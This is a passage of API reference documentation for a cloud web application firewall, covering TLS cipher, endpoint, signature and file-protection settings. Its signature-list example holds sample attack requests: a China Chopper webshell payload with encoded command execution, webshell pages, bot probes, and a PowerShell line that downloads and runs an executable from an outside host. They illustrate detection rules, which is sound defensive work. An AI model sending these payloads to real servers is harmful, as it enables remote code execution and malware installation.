- "ECDHE-ECDSA-CAMELLIA128-SHA256",
- "DHE-RSA-CHACHA20-POLY1305",
- "ECDHE-ECDSA-AES256-SHA384",
- "DHE-RSA-AES128-GCM-SHA256",
- "DHE-DSS-AES128-SHA256",
- "DHE-DSS-AES128-GCM-SHA256",
- "DHE-RSA-CAMELLIA128-SHA256",
- "AES256-CCM8",
- "AES256-SHA256",
- "AES128-SHA256",
- "DHE-RSA-AES256-CCM",
- "DHE-RSA-SEED-SHA",
- "ECDHE-ECDSA-AES256-CCM",
- "ECDHE-ECDSA-AES128-CCM",
- "DHE-RSA-CAMELLIA256-SHA256",
- "DHE-DSS-AES128-SHA",
- "ECDHE-ECDSA-CAMELLIA256-SHA384",
- "ECDHE-RSA-AES256-SHA",
- "AES128-SHA",
- "ECDHE-ECDSA-AES128-SHA",
- "DHE-DSS-CAMELLIA256-SHA",
- "DHE-RSA-AES256-GCM-SHA384",
- "ECDHE-RSA-CAMELLIA256-SHA384",
- "AES128-GCM-SHA256",
- "ECDHE-RSA-AES256-GCM-SHA384",
- "DHE-DSS-CAMELLIA256-SHA256",
- "ECDHE-RSA-CHACHA20-POLY1305",
- "ECDHE-ECDSA-AES128-CCM8",
- "AES256-CCM",
- "DES-CBC3-SHA",
- "AES128-CCM",
- "ECDHE-ECDSA-AES256-GCM-SHA384",
- "DHE-RSA-AES128-SHA",
- "DHE-RSA-AES256-SHA256",
- "DHE-RSA-CAMELLIA256-SHA",
- "ECDHE-ECDSA-AES256-CCM8",
- "DHE-DSS-AES256-SHA",
- "ECDHE-RSA-AES128-SHA256",
- "ECDHE-ECDSA-AES128-SHA256",
- "DHE-RSA-AES256-SHA"
], - "selected_ssl_custom_cipher_http2": [
- "ECDHE-RSA-AES256-GCM-SHA384",
- "ECDHE-ECDSA-AES256-GCM-SHA384",
- "DHE-DSS-AES128-GCM-SHA256",
- "DHE-RSA-AES128-GCM-SHA256"
], - "available_ssl_custom_cipher_http2": [
- "DHE-DSS-AES128-GCM-SHA256",
- "ECDHE-RSA-AES256-GCM-SHA384",
- "ECDHE-RSA-AES128-GCM-SHA256",
- "ECDHE-RSA-CHACHA20-POLY1305",
- "ECDHE-ECDSA-CHACHA20-POLY1305",
- "ECDHE-ECDSA-AES256-GCM-SHA384",
- "DHE-RSA-AES128-GCM-SHA256",
- "DHE-RSA-AES256-GCM-SHA384",
- "ECDHE-ECDSA-AES128-GCM-SHA256"
], - "selected_tls13_custom_cipher": [
- "TLS_AES_256_GCM_SHA384"
], - "available_tls13_custom_cipher": [
- "TLS_CHACHA20_POLY1305_SHA256",
- "TLS_AES_128_GCM_SHA256",
- "TLS_AES_128_CCM_8_SHA256",
- "TLS_AES_128_CCM_SHA256",
- "TLS_AES_256_GCM_SHA384"
]
}, - "custom_port": {
- "http": 80,
- "https": 443
}, - "block_mode": 1,
- "custom_block_page": "enable",
- "block_url": "/test/block.html"
}Modify endpoints configuration.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| app_name | string The application name |
{- "app_name": "test",
- "ep_cname": "test.demo.38906.waasonline.net.",
- "domain_name": "test.demo.com",
- "extra_domains": [
- "demo.com",
- "avc.demo.com"
], - "block_mode": 1,
- "ipv6_option": 0,
- "platform": "AWS",
- "cert_type": 0,
- "cert_challenge_mode": 1,
- "client_cert_verify": true,
- "cert_auto_status": 0,
- "block_url": "PredefinedMsg",
- "http_status": 1,
- "https_status": 1,
- "http2_status": 0,
- "ssl_options": {
- "tls_1_1": 0,
- "tls_1_2": 1,
- "tls_1_3": 1,
- "encryption_level": "high",
- "http_2_https": 0,
- "hsts_header": 0,
- "hsts_max_age": 31536000,
- "internal_cookie_secure": 0,
- "internal_cookie_httponly": 0,
- "selected_ssl_custom_cipher": [
- "DHE-RSA-AES128-GCM-SHA256",
- "DHE-RSA-AES256-GCM-SHA384",
- "ECDHE-ECDSA-AES128-GCM-SHA256",
- "ECDHE-ECDSA-AES256-GCM-SHA384",
- "ECDHE-ECDSA-CHACHA20-POLY1305",
- "ECDHE-RSA-AES128-GCM-SHA256",
- "ECDHE-RSA-AES256-GCM-SHA384",
- "ECDHE-RSA-CHACHA20-POLY1305"
], - "selected_ssl_custom_cipher_http2": [
- "DHE-RSA-AES128-GCM-SHA256",
- "DHE-RSA-AES256-GCM-SHA384",
- "ECDHE-ECDSA-AES128-GCM-SHA256",
- "ECDHE-ECDSA-AES256-GCM-SHA384",
- "ECDHE-ECDSA-CHACHA20-POLY1305",
- "ECDHE-RSA-AES128-GCM-SHA256",
- "ECDHE-RSA-AES256-GCM-SHA384",
- "ECDHE-RSA-CHACHA20-POLY1305"
], - "selected_tls13_custom_cipher": [
- "TLS_AES_128_GCM_SHA256",
- "TLS_AES_256_GCM_SHA384",
- "TLS_CHACHA20_POLY1305_SHA256"
]
}, - "custom_http_port": 8080,
- "custom_https_port": 443
}{- "detail": "Request unauthorized"
}Get the signature information.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| attack_category | string The signature category name such as 'Cross Site Scripting', 'Generic Attacks'. |
| signature_id | string |
| sensitivity_level | string |
| cve_number | string |
| keywords | string |
{- "Trojans": [
- {
- "id": "070000001",
- "desc": "This rule detects if there are specific header names which are used by trojan horses in HTTP headers. \nThis injection can be achieved in HTTP request header names.\n",
- "sample": "GET /rootkit.php HTTP/1.1\r\nHost: yoursite.com\r\nReferer: http://yoursite.com/\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR1.1.4322)\r\nPragma: no-cache\r\nAccept: */*\r\n<#X_File:#> data.txt\r\nConnection: Keep-Alive\r\nCookie:CustomCookie=WebInspect0\r\n\r\n"
}, - {
- "id": "070000004",
- "desc": "This signature prevents attackers from performing Command injection attacks using commands.\nThis attack can be achieved in HTTP request URL and arguments.",
- "sample": "POST /c99.php?<#act=encoder&d=#>%2Fvar%2Fwww%2F HTTP/1.1\r\nAccept: text/html, application/xhtml+xml, */*\r\nReferer: http://www.mysite.com\r\nAccept-Language: zh-cn\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip, deflate\r\nHost: www.mysite.com\r\nContent-Length: 21\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nCookie: ASPSESSIONIDSSSRSCQC=NLJDKABDHLCCNEDHAMCCDAAC\r\n\r\nencoder_input=abcdefg"
}, - {
- "id": "070000005",
- "desc": "This signature prevents attackers from accessing P.A.S Webshell located on the target webserver. This attack can be achieved in HTTP response body.",
- "sample": "HTTP/1.1 200 OK\r\nDate: Sun, 06 Nov 2011 08:20:35 GMT\r\nServer: Apache/2.2.17 (Unix)\r\nContent-Length: 3384\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html\r\n\r\n<html> \r\n\t<head> \r\n\t\t<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\"/> \r\n\t\t<title>127.0.0.1</title> \r\n\t\t<script>\r\n\t\t\tfunction ca(v, f_n) { \r\n\t\t\t\tvar cb=document.getElementById(f_n);\r\n\t\t\t\tfor(i=1, n=cb.elements.length; i<n; i++){\r\n\t\t\t\t\tif(cb.elements[i].type=='checkbox') \r\n\t\t\t\t\t\tcb.elements[i].checked=v;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t</script> \r\n\t</head>\r\n\t<body> \r\n\t\t<fieldset class=\"head\">\r\n\t\t\t<table class=\"head\"> \r\n\t\t\t\t<tr><th style=\"width:125px\">Server address :</th>\r\n\t\t\t\t\t<td>\r\n\t\t\t\t\t\t10.200.3.13:8080 on 10.200.3.13 (10.200.3.13:8080, 10.200.3.13) / jlufocus\t\t\t\t\t\t</td>\r\n\t\t\t\t\t</tr>\r\n\t\t\t\t<tr>\r\n\t\t\t\t\t<th>Server OS :</th>\r\n\t\t\t\t\t<td>Linux 3.16.0-23-generic #31-Ubuntu SMP Tue Oct 21 17:56:17 UTC 2014 x86_64</td>\r\n\t\t\t\t</tr>\r\n\t\t\t\t<tr>\r\n\t\t\t\t\t<th>Server software :</th>\r\n\t\t\t\t\t<td><b>PHP</b>/5.5.12-2ubuntu4.4 <b>Apache</b>/2.4.10 (Ubuntu) <b>cURL</b> <b>MySQL</b>/5.5.40\t\t\t\t\t</td>\r\n\t\t\t\t</tr>\r\n\t\t\t\t<tr>\r\n\t\t\t\t\t<th>User info :</th>\r\n\t\t\t\t\t<td>\r\n\t\t\t\t\t\tuid=33(www-data) gid=33(www-data)\t\t\t\t\t</td>\r\n\t\t\t\t</tr>\r\n\t\t\t\t<tr><th>Disable functions : </th><td style=\"color:#FF4500\">pcntl_alarm, pcntl_fork, pcntl_waitpid, pcntl_wait, pcntl_wifexited, pcntl_wifstopped, pcntl_wifsignaled, pcntl_wexitstatus, pcntl_wtermsig, pcntl_wstopsig, pcntl_signal, pcntl_signal_dispatch, pcntl_get_last_error, pcntl_strerror, pcntl_sigprocmask, pcntl_sigwaitinfo, pcntl_sigtimedwait, pcntl_exec, pcntl_getpriority, pcntl_setpriority, </td></tr>\t\t\t</table>\r\n\t\t</fieldset> \r\n\t\t<fieldset class=\"menu\">\r\n\t\t\t<form action=\"\" method=\"post\"> \r\n\t\t\t\t<button type=\"submit\" name=\"fe\">Explorer</button> \r\n\t\t\t\t<button type=\"submit\" name=\"fs\">Searcher</button> \r\n\t\t\t\t<button type=\"submit\" name=\"se\">SQL-client</button> \r\n\t\t\t\t<button type=\"submit\" name=\"nt\">Network Tools</button> \r\n\t\t\t\t \r\n\t\t\t\t\t<button type=\"submit\" name=\"br\">passwd BruteForce</button> \r\n\t\t\t\t \r\n\t\t\t\t<button type=\"submit\" name=\"sc\">CMD</button> \r\n\t\t\t\t<button type=\"submit\" name=\"si\">Server info</button> \r\n\t\t\t</form>\r\n\t\t</fieldset> \r\n\t\t<fieldset class=\"nav\">\r\n\t\t\t<table width=\"100%\">\r\n\t\t\t\t<tr>\r\n\t\t\t\t\t<th width=\"50px\" align=\"left\">Go to :</th>\r\n\t\t\t\t</tr>\r\n\t\t\t</table>\r\n\t\t\t</fieldset> \r\n\t\t\t<fieldset class=\"nav\">\r\n\t\t\t\t<form action=\"\" method=\"post\">\r\n\t\t\t\t<input type=\"hidden\" name=\"fe\"/><b>Jump :</b> \r\n\t\t\t\t<button type=\"submit\"name=\"fp\"class=\"sb\"value=\"/\">/</button><button type=\"submit\"name=\"fp\"class=\"sb\"value=\"/var/\">var/</button><button type=\"submit\"name=\"fp\"class=\"sb\"value=\"/var/www/\">www/</button><button type=\"submit\"name=\"fp\"class=\"sb\"value=\"/var/www/html/\">html/</button><button type=\"submit\"name=\"fp\"class=\"sb\"value=\"/var/www/html/c99/\">c99/</button>\t\t\t\t</form>\r\n\t\t\t</fieldset>\r\n\t\t\t\t\t\t\t<fieldset style='font:normal 12px \"Courier New\"'>\r\n\t\t\t\t\t<form action=\"\" method=\"post\" style=\"margin-bottom:5px;\">Exec : \r\n\t\t\t\t\t\t<input type=\"text\" name=\"ex\" value=\"uname -a\" style=\"width:895px;\"/> \r\n\t\t\t\t\t\t<button type=\"submit\" name=\"sc\">></button>\r\n\t\t\t\t\t</form>\r\n\t\t\t\t\t<form action=\"\" method=\"post\" style=\"margin-top:5px\">Eval : \r\n\t\t\t\t\t\t<input type=\"text\" name=\"ev\" value=\"phpinfo();\" style=\"width:895px;\"/> \r\n\t\t\t\t\t\t<button type=\"submit\" name=\"sc\">></button>\r\n\t\t\t\t\t</form>\r\n\t\t\t\t</fieldset>\r\n\t\t\t\t<fieldset class=\"footer\">\r\n\t\t\t\t\t<table width=\"100%\" border=\"0\">\r\n\t\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t<#<td>P.A.S. v.3.1.4</td>#>\r\n\t\t\t\t\t\t\t<td align=\"center\">\r\n\t\t\t\t\t\t\t</td>\r\n\t\t\t\t\t\t\t<td align=\"right\">0.000 s.</td>\r\n\t\t\t\t\t\t</tr>\r\n\t\t\t\t\t</table>\r\n\t\t\t\t</fieldset>\r\n\t</body>\r\n</html>"
}, - {
- "id": "070000006",
- "desc": "This signature prevents attackers from accessing RC-SHELL Webshell located on the target webserver. This attack can be achieved in HTTP response body.",
- "sample": "HTTP/1.1 200 OK\r\nDate: Sun, 06 Nov 2011 08:20:35 GMT\r\nServer: Apache/2.2.17 (Unix)\r\nContent-Length: 343\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html\r\n\r\n<html> \r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html\">\r\n<link rel=\"shortcut icon\" href=\"?act=i&img=exe\">\r\n<title>[ RC-SHELL v2.0.2011.1009 - 10.200.3.13 - 10.200.3.13 ]</title>\r\n...\r\n<td class=\"tdfooter\">\r\n<#RC-SHELL v2.0.2011.1009 : PAGE GENERATED IN 0.0121 SECONDS</td>#>\r\n<td align=\"right\" class=\"tdfooter\">\r\n</body>\r\n</html>"
}, - {
- "id": "070000007",
- "desc": "This signature prevents attackers from accessing b374 Webshell located on the target webserver. This attack can be achieved in HTTP response body.",
- "sample": "HTTP/1.1 200 OK\r\nDate: Sun, 06 Nov 2011 08:20:35 GMT\r\nServer: Apache/2.2.17 (Unix)\r\nContent-Length: 287\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html\r\n\r\n<html> \r\n<head>\r\n<title>b374k 3.2.2</title>\r\n</head>\r\n<body>\r\n<div id='wrapper'>\r\n\t<!--header start-->\r\n\t<div id='header'>\r\n\t\t<!--header info start-->\r\n\t\t<div id='headerNav'>\r\n<span><#<a onclick=\"set_cookie('cwd', '');\" href='/b374k-3.2.2.php'>b374k 3.2.2</a></span>#>\r\n...\r\n</body>\r\n</html>"
}, - {
- "id": "070000008",
- "desc": "This signature prevents attackers from accessing backdoor in WP Custom Content Type Manager. This attack can be achieved in HTTP request URL.",
- "sample": "GET /<#plugins/custom-content-type-manager/auto-update.php#> HTTP/1.1\r\nHost: yoursite.com\r\nReferer: http://yoursite.com/\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR1.1.4322)\r\nPragma: no-cache\r\nAccept: */*\r\nConnection: Keep-Alive\r\nCookie:CustomCookie=WebInspect0\r\n\r\n"
}, - {
- "id": "070000009",
- "desc": "This signature prevents attackers from accessing China Chooper Web backdoor. This attack can be achieved in HTTP request argument.",
- "sample": "POST /evil.aspx HTTP/1.1\r\nHost: yoursite.com\r\nConnection: close\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\r\nAccept: */*\r\nContent-Length: 1108\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nPassword=Response.Write(\"->|\");<#var err:Exception;try{eval(System.Text.Encoding.GetEncoding(65001).GetString(System. Convert.FromBase64String(\"dmFyIGM9bmV3IFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzU3RhcnRJbmZvKFN5c3RlbS5UZXh0LkVuY29kaW5nLkdldEVuY29kaW5nKDY1MDAxKS5HZXRTdHJpbmcoU3lzdGVtLkNvbnZlcnQuRnJvbUJhc2U2NFN0cmluZyhSZXF1ZXN0Lkl0ZW1bInoxIl0pKSk7dmFyIGU9bmV3IFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzKCk7dmFyIG91dDpTeXN0ZW0uSU8uU3RyZWFtUmVhZGVyLEVJOlN5c3RlbS5JTy5TdHJlYW1SZWFkZXI7Yy5Vc2VTaGVsbEV4ZWN1dGU9ZmFsc2U7Yy5SZWRpcmVjdFN0YW5kYXJkT3V0cHV0PXRydWU7Yy5SZWRpcmVjdFN0YW5kYXJkRXJyb3I9dHJ1ZTtlLlN0YXJ0SW5mbz1jO2MuQXJndW1lbnRzPSIvYyAiK1N5c3RlbS5UZXh0LkVuY29kaW5nLkdldEVuY29kaW5nKDY1MDAxKS5HZXRTdHJpbmcoU3lzdGVtLkNvbnZlcnQuRnJvbUJhc2U2NFN0cmluZyhSZXF1ZXN0Lkl0ZW1bInoyIl0pKTtlLlN0YXJ0KCk7b3V0PWUuU3RhbmRhcmRPdXRwdXQ7RUk9ZS5TdGFuZGFyZEVycm9yO2UuQ2xvc2UoKTtSZXNwb25zZS5Xcml0ZShvdXQuUmVhZFRvRW5kKCkrRUkuUmVhZFRvRW5kKCkpOw%3D%3D\")),\"unsafe\");}catch(err){Response.Write(\"ERROR:// \"%2Berr.message);}Response.Write(\"|<-\");Response.End();#>&<#z1#>=Y21k&<#z2#>=Y2QgL2QgImM6XGluZXRwdWJcd3d3cm9vdFwiJndob2FtaSZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D"
}, - {
- "id": "070000010",
- "desc": "null",
- "sample": "POST /evil.aspx HTTP/1.1\r\nHost: yoursite.com\r\nConnection: close\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\r\nAccept: */*\r\nContent-Length: 1108\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nPassword=Response.Write(\"->|\");<#var err:Exception;try{eval(System.Text.Encoding.GetEncoding(65001).GetString(System. Convert.FromBase64String(\"dmFyIGM9bmV3IFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzU3RhcnRJbmZvKFN5c3RlbS5UZXh0LkVuY29kaW5nLkdldEVuY29kaW5nKDY1MDAxKS5HZXRTdHJpbmcoU3lzdGVtLkNvbnZlcnQuRnJvbUJhc2U2NFN0cmluZyhSZXF1ZXN0Lkl0ZW1bInoxIl0pKSk7dmFyIGU9bmV3IFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzKCk7dmFyIG91dDpTeXN0ZW0uSU8uU3RyZWFtUmVhZGVyLEVJOlN5c3RlbS5JTy5TdHJlYW1SZWFkZXI7Yy5Vc2VTaGVsbEV4ZWN1dGU9ZmFsc2U7Yy5SZWRpcmVjdFN0YW5kYXJkT3V0cHV0PXRydWU7Yy5SZWRpcmVjdFN0YW5kYXJkRXJyb3I9dHJ1ZTtlLlN0YXJ0SW5mbz1jO2MuQXJndW1lbnRzPSIvYyAiK1N5c3RlbS5UZXh0LkVuY29kaW5nLkdldEVuY29kaW5nKDY1MDAxKS5HZXRTdHJpbmcoU3lzdGVtLkNvbnZlcnQuRnJvbUJhc2U2NFN0cmluZyhSZXF1ZXN0Lkl0ZW1bInoyIl0pKTtlLlN0YXJ0KCk7b3V0PWUuU3RhbmRhcmRPdXRwdXQ7RUk9ZS5TdGFuZGFyZEVycm9yO2UuQ2xvc2UoKTtSZXNwb25zZS5Xcml0ZShvdXQuUmVhZFRvRW5kKCkrRUkuUmVhZFRvRW5kKCkpOw%3D%3D\")),\"unsafe\");}catch(err){Response.Write(\"ERROR:// \"%2Berr.message);}Response.Write(\"|<-\");Response.End();#>&<#z1#>=Y21k&<#z2#>=Y2QgL2QgImM6XGluZXRwdWJcd3d3cm9vdFwiJndob2FtaSZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D"
}, - {
- "id": "070000011",
- "desc": "This signature prevents attackers from scanning MuieBlackCat Bot. This attack can be achieved in HTTP request URL.",
- "sample": "GET /<#muieblackcat#> HTTP/1.1\r\nReferer: http://yoursite.com/\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR1.1.4322)\r\nPragma: no-cache\r\nAccept: */*\r\nHost: yoursite.com\r\nConnection: Keep-Alive\r\nCookie:CustomCookie=WebInspect0\r\n\r\n"
}, - {
- "id": "070000012",
- "desc": "This signature prevents attackers from scanning w00tw00t Bot. This attack can be achieved in HTTP request URL.",
- "sample": "GET /<#w00tw00t.at.ISC.SANS.DFind#> HTTP/1.1\r\nReferer: http://yoursite.com/\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR1.1.4322)\r\nPragma: no-cache\r\nAccept: */*\r\nHost: yoursite.com\r\nConnection: Keep-Alive\r\nCookie:CustomCookie=WebInspect0\r\n\r\n"
}, - {
- "id": "070000013",
- "desc": "This signature prevents attackers from scanning muhstik Bot. This attack can be achieved in HTTP request URL.",
- "sample": "GET /<#muhstik.php#> HTTP/1.1\r\nReferer: http://yoursite.com/\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR1.1.4322)\r\nPragma: no-cache\r\nAccept: */*\r\nHost: yoursite.com\r\nConnection: Keep-Alive\r\nCookie:CustomCookie=WebInspect0\r\n\r\n"
}, - {
- "id": "070000014",
- "desc": "This signature prevents attackers from scanning Miner Bot. This attack can be achieved in HTTP request URL and argument.",
- "sample": "GET /<#public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/7.exe');start%20C:/7.exe #> HTTP/1.1\r\nReferer: http://yoursite.com/\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR1.1.4322)\r\nPragma: no-cache\r\nAccept: */*\r\nHost: yoursite.com\r\nConnection: Keep-Alive\r\nCookie:CustomCookie=WebInspect0\r\n\r\n"
}, - {
- "id": "070000015",
- "desc": "null",
- "sample": "GET /<#public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/7.exe');start%20C:/7.exe #> HTTP/1.1\r\nReferer: http://yoursite.com/\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR1.1.4322)\r\nPragma: no-cache\r\nAccept: */*\r\nHost: yoursite.com\r\nConnection: Keep-Alive\r\nCookie:CustomCookie=WebInspect0\r\n\r\n"
}, - {
- "id": "070000016",
- "desc": "This signature prevents attackers from accessing ReDuh/reGeorg tunnel. This attack can be achieved in HTTP request header.",
- "sample": "POST /tunnel.nosocket.php?cmd=read HTTP/1.1\r\n<#X-CMD: READ#>\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR1.1.4322)\r\nPragma: no-cache\r\nAccept: */*\r\nHost: yoursite.com\r\nConnection: Keep-Alive\r\nCookie:CustomCookie=WebInspect0\r\n\r\n"
}
]
}Get the information of signature exception.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| signatureid | string The signature ID. |
{- "result": {
- "template": "66djd67d-644a-46a9-8975-961c193f195f"
}
}Update the information of signature exception.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
required | Array of objects (SignatureExceptionItem) |
{- "exception rule": {
- "signature_id": "030000001",
- "signature_name": "SQL Injection",
- "url": {
- "operator": "STRING_MATCH",
- "value": "/foo",
- "status": "enable"
}, - "parameter": {
- "operator": "STRING_MATCH",
- "value": "bar",
- "status": "enable"
}, - "cookie": {
- "operator": "STRING_MATCH",
- "value": "baz",
- "status": "enable"
}
}
}{- "detail": "Module updated"
}Get the configuration of parameter validation.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "rule_list": [
- {
- "idx": 1,
- "name": "1",
- "url": " /1",
- "action": "alert",
- "block_period": 60,
- "sub_rule_list": [
- {
- "idx": 1,
- "name": "a",
- "max_len": 100,
- "required": true,
- "type_check": true,
- "arg_type": "data-type",
- "arg_val": "Email"
}, - {
- "idx": 2,
- "name": "b",
- "max_len": 50,
- "required": true,
- "type_check": true,
- "arg_type": "regular-expression",
- "arg_val": "aaa"
}
]
}
]
}
}
}Update the configuration of parameter validation.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (ParameterValidation) |
{- "template": false,
- "configs": {
- "status": true,
- "rule_list": [
- {
- "idx": 1,
- "name": "1",
- "url": " /1",
- "action": "alert",
- "block_period": 60,
- "sub_rule_list": [
- {
- "idx": 1,
- "name": "a",
- "max_len": 100,
- "required": true,
- "type_check": true,
- "arg_type": "data-type",
- "arg_val": "Email"
}, - {
- "idx": 2,
- "name": "b",
- "max_len": 50,
- "required": true,
- "type_check": true,
- "arg_type": "regular-expression",
- "arg_val": "aaa"
}
]
}
]
}
}{- "detail": "Module updated"
}Get the configuration of information leakage.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "action": "deny_erase_no_log",
- "server_info_disclose": true,
- "personal_info": false,
- "cloak_error_pages": true,
- "erase_http_headers": true,
- "http_headers": [
- "a",
- "b"
], - "sig_except_rules": [
- {
- "idx": 1,
- "sig_name": "Server Information Disclosure",
- "sig_id": "080060001",
- "url": {
- "type": "string",
- "value": "/1",
- "status": true
}, - "param": {
- "type": "regex",
- "value": "a",
- "status": true
}, - "cookie": {
- "type": "regex",
- "value": "b",
- "status": true
}
}
]
}
}
}Update the configuration of information leakage.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| template required | boolean Enum: true false Enable to inherit configuration from template |
required | object (InformationLeakage) |
{- "template": false,
- "configs": {
- "status": true,
- "action": "deny_erase_no_log",
- "server_info_disclose": true,
- "personal_info": false,
- "cloak_error_pages": true,
- "erase_http_headers": true,
- "http_headers": [
- "a",
- "b"
], - "sig_except_rules": [
- {
- "idx": 1,
- "sig_name": "Server Information Disclosure",
- "sig_id": "080060001",
- "url": {
- "type": "string",
- "value": "/1",
- "status": true
}, - "param": {
- "type": "regex",
- "value": "a",
- "status": true
}, - "cookie": {
- "type": "regex",
- "value": "b",
- "status": true
}
}
]
}
}{- "detail": "Module updated"
}Get the configuration of file protection.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "template": false,
- "configs": {
- "status": true,
- "action": "alert_deny",
- "trojan": true,
- "sandbox": true,
- "av_scan": true,
- "file_action": "Allow",
- "file_size": 1024,
- "url": "/1",
- "file_types": [
- {
- "idx": 1,
- "type": "GIF",
- "tid": "00001"
}, - {
- "idx": 2,
- "type": "XPS",
- "tid": "00059"
}
]
}
}
}Update the configuration of file protection.
The table below shows the keys and values of "file-type-id" and "file-type-name".
| file-type-id | file-type-name |
|---|---|
| 00001 | GIF |
| 00002 | JPG |
| 00010 | BMP |
| 00018 | PNG |
| 00019 | TIFF/TIF |
| 00023 | Windows Metafile Format(.wmf) |
| 00024 | Corel Draw Picture |
| 00028 | Windows Icon |
| 00030 | Microsoft Document Image(.mdi) |
| 00032 | Windows Enhanced Metafile(.emf) |
| 00038 | Photoshop Image File(.psd) |
| 00050 | JPEG-2000 Image File Format(.jp2) |
| 00054 | Multipage PCX Bitmap File(.dcx) |
| 00059 | XPS |
| 00089 | TXT |
| 00060 | Word(.docx) |
| 00061 | Word Macro-Enabled(.docm) |
| 00062 | Word Template(.dotx) |
| 00063 | Word Macro-Enabled Template(.dotm) |
| 00064 | Excel(.xlsx) |
| 00065 | Excel Macro-Enabled(.xlsm) |
| 00066 | Excel Template(.xltx) |
| 00067 | Excel Macro-Enabled Template(.xltm) |
| 00068 | Excel Add-In(.xlam) |
| 00069 | PPT(.pptx) |
| 00070 | PPT Macro-Enabled(.pptm) |
| 00071 | PPT Template(.potx) |
| 00072 | PPT Macro-Enabled Template(.potm) |
| 00073 | PPT Add-In(.ppam) |
| 00074 | PPT Show(.ppsx) |
| 00075 | PPT Macro-Enabled Show(.ppsm) |
| 00076 | Visio Drawing(.vsdx) |
| 00077 | Visio Macro-Enabled Drawing(.vsdm) |
| 00078 | Visio Stencil(.vssx) |
| 00079 | Visio Macro-Enabled Stencil(.vssm) |
| 00080 | Visio Template(.vstx) |
| 00081 | Visio Macro-Enabled Template(.vstm) |
| 00003 | |
| 00004 | XML |
| 00021 | CHM |
| 00022 | EXE |
| 00026 | RTF |
| 00036 | Windows Help File(.hlp) |
| 00042 | Windows Mobile Note(.pwi) |
| 00043 | Windows Registry Text(.reg) |
| 00046 | SQL Server 2000 Database(.mdf) |
| 00047 | Java Archive(.jar) |
| 00048 | Windows Printer Spool File(.shd) |
| 00049 | Windows Shortcut File(.lnk) |
| 00051 | Quark Express Document(.qxd) |
| 00053 | Windows MS Info File(.mof) |
| 00055 | Microsoft Access Database(.MDB) |
| 00056 | SPSS Data(.SAV) |
| 00083 | RedHat Package Manager file(.RPM) |
| 00082 | VMware Virtual Disk File(.vmdk) |
| 00084 | Lotus WordPro document(.LWP) |
| 00085 | Adobe encapsulated PostScript file(.EPS) |
| 00086 | Lotus 1-2-3 spreadsheet(.WK) |
| 00087 | SkinCrafter skin file(.skf) |
| 00088 | Nero CD Compilation(.NRI) |
| 00090 | Microsoft Office Word(.doc) |
| 00091 | Microsoft Office Excel(.xls) |
| 00092 | Microsoft Office PowerPoint(.ppt) |
| 00093 | Hancom Office Hanword(.hwp) |
| 00005 | MP3 |
| 00006 | MIDI |
| 00007 | WAVE |
| 00031 | Apple CoreAudio(.caf) |
| 00037 | Microsoft Advanced Streaming(.asf) |
| 00039 | Real Audio File(.ra) |
